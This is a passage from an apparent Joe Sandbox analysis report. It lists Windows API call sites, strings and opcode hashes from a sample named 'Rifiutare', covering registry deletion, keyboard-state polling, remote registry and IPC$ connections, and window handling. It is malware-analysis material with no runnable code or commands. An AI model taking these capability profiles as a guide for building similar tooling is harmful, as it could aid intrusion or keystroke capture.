                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                • String ID: 0
                                                                                • API String ID: 1460738036-4108050209
                                                                                • Opcode ID: 7df2e05c1e89cf76b736597cab1c366eace6014907f18974e6aa281a59312c35
                                                                                • Instruction ID: 9891093fe106b22254ff9206b87206a742352258d587e2c31df23db28ada5061
                                                                                • Opcode Fuzzy Hash: 7df2e05c1e89cf76b736597cab1c366eace6014907f18974e6aa281a59312c35
                                                                                • Instruction Fuzzy Hash: BA617AB190025AAFDF11CF68D9CCBFEBBA8EB05344F154069E856A3291D734AE01DB60
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBD3DE
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00CBD407
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CBD4C2
                                                                                  • Part of subcall function 00CBD3AE: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CBD424
                                                                                  • Part of subcall function 00CBD3AE: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00CBD437
                                                                                  • Part of subcall function 00CBD3AE: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CBD449
                                                                                  • Part of subcall function 00CBD3AE: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CBD47F
                                                                                  • Part of subcall function 00CBD3AE: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBD4A2
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CBD46D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2734957052-4033151799
                                                                                • Opcode ID: 2b9ac7c1c23f3b52c7e4c3a50e3f9c26699ab9d16399a114d8616c8a4cc73462
                                                                                • Instruction ID: 58dbc60e055abe812fabe1032787158bb7b7ec5ce8c7670f1d34173f2b84b68b
                                                                                • Opcode Fuzzy Hash: 2b9ac7c1c23f3b52c7e4c3a50e3f9c26699ab9d16399a114d8616c8a4cc73462
                                                                                • Instruction Fuzzy Hash: A8318072901129BBD7209B91DC88FFFBB7CEF15710F000165F917E2150EB34AA459AB0
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 00C9EE8B
                                                                                  • Part of subcall function 00C4EDA7: timeGetTime.WINMM(?,?,00C9EEAB), ref: 00C4EDAB
                                                                                • Sleep.KERNEL32(0000000A), ref: 00C9EEB8
                                                                                • EnumThreadWindows.USER32(?,Function_0006EE3C,00000000), ref: 00C9EEDC
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C9EEFE
                                                                                • SetActiveWindow.USER32 ref: 00C9EF1D
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C9EF2B
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C9EF4A
                                                                                • Sleep.KERNEL32(000000FA), ref: 00C9EF55
                                                                                • IsWindow.USER32 ref: 00C9EF61
                                                                                • EndDialog.USER32(00000000), ref: 00C9EF72
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: dc5fa9575468936f1194d54ff6a2c9221c5a8bc785396ac608d1e90465a2a70f
                                                                                • Instruction ID: 01825269e0e32799c6f21ace659748354668ef716e73f6cc0405c3f6ec905ac7
                                                                                • Opcode Fuzzy Hash: dc5fa9575468936f1194d54ff6a2c9221c5a8bc785396ac608d1e90465a2a70f
                                                                                • Instruction Fuzzy Hash: 44212770214345BFEB05EFA1EC8CF2A7B69FB64B45B440029F51BD23A1CA729D449A61
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C9F234
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C9F24A
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C9F25B
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C9F26D
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C9F27E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$_wcslen
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 2420728520-1007645807
                                                                                • Opcode ID: 7e1ab51e5024dc07cf22932d070a013052b29f78ed4d2c144a04f2c55753fb69
                                                                                • Instruction ID: e19972da6e69ff5fcd280ee4292cb61d796153c718036df2dfaa114a8d15b2c1
                                                                                • Opcode Fuzzy Hash: 7e1ab51e5024dc07cf22932d070a013052b29f78ed4d2c144a04f2c55753fb69
                                                                                • Instruction Fuzzy Hash: 2211A370A9411D79DB60A7A1DC4EFFF6A7CEBD2B40F000539B511E20D1DAA05E05C5B2
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00C9A836
                                                                                • SetKeyboardState.USER32(?), ref: 00C9A8A1
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00C9A8C1
                                                                                • GetKeyState.USER32(000000A0), ref: 00C9A8D8
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00C9A907
                                                                                • GetKeyState.USER32(000000A1), ref: 00C9A918
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00C9A944
                                                                                • GetKeyState.USER32(00000011), ref: 00C9A952
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00C9A97B
                                                                                • GetKeyState.USER32(00000012), ref: 00C9A989
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00C9A9B2
                                                                                • GetKeyState.USER32(0000005B), ref: 00C9A9C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: b02ea0aafe2efdbedda87ee1d83de66ee425700ae6e2795094f0594e69974c5a
                                                                                • Instruction ID: 51a445495408c0f0623d2e76bb06a6df6dd941a809b1b8bcd877a2297e237c06
                                                                                • Opcode Fuzzy Hash: b02ea0aafe2efdbedda87ee1d83de66ee425700ae6e2795094f0594e69974c5a
                                                                                • Instruction Fuzzy Hash: A251B52090478869EF35D7A089197EABFF4AF01380F098599D5D25A1C2DA64AF4CC7E7
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00C964FE
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00C96517
                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C96575
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00C96585
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00C96597
                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C965EB
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00C965F9
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00C9660B
                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C9664D
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00C96660
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C96676
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C96683
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: 6ec37637ee14276f1beeb617f6743060ee4a95028629663d0eab4be1bb163719
                                                                                • Instruction ID: dc7f20979454baec9b4b0ccb177411b0b84ab08855b97d28865564e6d421ea44
                                                                                • Opcode Fuzzy Hash: 6ec37637ee14276f1beeb617f6743060ee4a95028629663d0eab4be1bb163719
                                                                                • Instruction Fuzzy Hash: FD51EFB1A00205AFDF18CF69DD89BAEBBB5FB48310F518129F516E7294D770AE04CB50
                                                                                APIs
                                                                                  • Part of subcall function 00C3670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C316CD,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C36772
                                                                                • DestroyWindow.USER32(?), ref: 00C31766
                                                                                • KillTimer.USER32(00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C31800
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00C72BFF
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C72C2D
                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C72C44
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000), ref: 00C72C60
                                                                                • DeleteObject.GDI32(00000000), ref: 00C72C72
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 2e2c2a2331548cee2b1e47a173b01fcb5872c99b2f45b3d12316e864239f3a5f
                                                                                • Instruction ID: faf5b2f9703b4e8fa9f6085ea3349b3a4e8a40a5c950c67db785195129b5c68b
                                                                                • Opcode Fuzzy Hash: 2e2c2a2331548cee2b1e47a173b01fcb5872c99b2f45b3d12316e864239f3a5f
                                                                                • Instruction Fuzzy Hash: 9561AE30522700DFDB26DF15DD89B3977B1FB51312F188429E89A9B6A0C770AE81DF90
                                                                                APIs
                                                                                  • Part of subcall function 00C32184: GetWindowLongW.USER32(?,000000EB), ref: 00C32192
                                                                                • GetSysColor.USER32(0000000F), ref: 00C320A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: ae4a98940de02a20619b0630f8bf7bef7af4a72280e93c3eb12ffc538fa2fda6
                                                                                • Instruction ID: da3e2b1a1ec92706582683db876df44f274056e73f1ce8bf00f1237b9e77a1bc
                                                                                • Opcode Fuzzy Hash: ae4a98940de02a20619b0630f8bf7bef7af4a72280e93c3eb12ffc538fa2fda6
                                                                                • Instruction Fuzzy Hash: B641A031250640AFDF245B38DD48BBD7766AB46731F188215FAB78B2E1C7319E42EB10
                                                                                APIs
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C90FC1
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C90FDD
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C90FF9
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C91023
                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C9104B
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C91056
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9105B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 323675364-22481851
                                                                                • Opcode ID: fea9dc4ba99034d21563f56a57b3e22893c5f5ed64a44c71354aa6b8124d7eb0
                                                                                • Instruction ID: aa19c82786d10e8607507be67eab6a2297a95c0e0e3881cd78c922040c53da7f
                                                                                • Opcode Fuzzy Hash: fea9dc4ba99034d21563f56a57b3e22893c5f5ed64a44c71354aa6b8124d7eb0
                                                                                • Instruction Fuzzy Hash: 7841FA72C2022DABCF25EBA4DC95DEEB7B8FF04750F044129E912A31A1DB709E44DB50
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CC4717
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00CC471E
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CC4731
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00CC4739
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CC4744
                                                                                • DeleteDC.GDI32(00000000), ref: 00CC474E
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00CC4758
                                                                                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CC476E
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CC477A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: 2423a584a2319d228519150bb058dd385970b763321dfa10585d1aa19e19fad8
                                                                                • Instruction ID: 9a3909508a14efa0fa59893a3ffa3d5222f1939df10784ea34b9151f085d95f4
                                                                                • Opcode Fuzzy Hash: 2423a584a2319d228519150bb058dd385970b763321dfa10585d1aa19e19fad8
                                                                                • Instruction Fuzzy Hash: 14316F31100219ABDF129F64DC49FDE3BA9FF0A325F114229FA26A61A0C775D961DBA0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00CB442F
                                                                                • CoInitialize.OLE32(00000000), ref: 00CB445D
                                                                                • CoUninitialize.OLE32 ref: 00CB4467
                                                                                • _wcslen.LIBCMT ref: 00CB4500
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00CB4584
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CB46A8
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CB46E1
                                                                                • CoGetObject.OLE32(?,00000000,00CD0B5C,?), ref: 00CB4700
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00CB4713
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CB4797
                                                                                • VariantClear.OLEAUT32(?), ref: 00CB47AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                • String ID:
                                                                                • API String ID: 429561992-0
                                                                                • Opcode ID: 9a9b4a4af52b7e697ce21f5ddfd407c7dcdbf070eeaced082485102c8273f68b
                                                                                • Instruction ID: e86508c010e39469f9a0d5c556c473b0dd83a9cc1ae1603bca173ad0ddb2ae34
                                                                                • Opcode Fuzzy Hash: 9a9b4a4af52b7e697ce21f5ddfd407c7dcdbf070eeaced082485102c8273f68b
                                                                                • Instruction Fuzzy Hash: C1C14571608301AFC704DF68C884A6AB7E9FF89748F10496DF99A9B252DB30ED45CB52
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 00CA82F4
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CA8390
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00CA83A4
                                                                                • CoCreateInstance.OLE32(00CD0CCC,00000000,00000001,00CF7E4C,?), ref: 00CA83F0
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CA8475
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00CA84CD
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00CA8558
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CA857B
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00CA8582
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00CA85D7
                                                                                • CoUninitialize.OLE32 ref: 00CA85DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2762341140-0
                                                                                • Opcode ID: d3c8aaa6154e6dc1e677f5534ac3549b8ee899479ff5d5fd9a9e8cc33cdcefd7
                                                                                • Instruction ID: 6b938ae8dabf571882b8f297f0d80548ec5ac701414029c06e91456054a8af6b
                                                                                • Opcode Fuzzy Hash: d3c8aaa6154e6dc1e677f5534ac3549b8ee899479ff5d5fd9a9e8cc33cdcefd7
                                                                                • Instruction Fuzzy Hash: 73C10C75A00205AFDB14DF64C888D9EBBF5FF49318B1484A9F916DB261DB30EE45CB90
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C902CE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00C90327
                                                                                • VariantInit.OLEAUT32(?), ref: 00C90339
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C90359
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00C903AC
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C903C0
                                                                                • VariantClear.OLEAUT32(?), ref: 00C903D5
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00C903E2
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C903EB
                                                                                • VariantClear.OLEAUT32(?), ref: 00C903FD
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C90408
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: c3edaf44c3efb49a56f435a826e0070760466cea805627a96f1c42b5b202e8da
                                                                                • Instruction ID: 076553faee9ad6373ab041439a050475511aaf2580456917af3f63a25b27a397
                                                                                • Opcode Fuzzy Hash: c3edaf44c3efb49a56f435a826e0070760466cea805627a96f1c42b5b202e8da
                                                                                • Instruction Fuzzy Hash: A9414075A00219DFCF04DF64D848EADBBB9FF48344F108069E956A7261DB34EA45CFA0
                                                                                APIs
                                                                                  • Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00CCA5CF
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00CCA5EF
                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CCA82C
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CCA84A
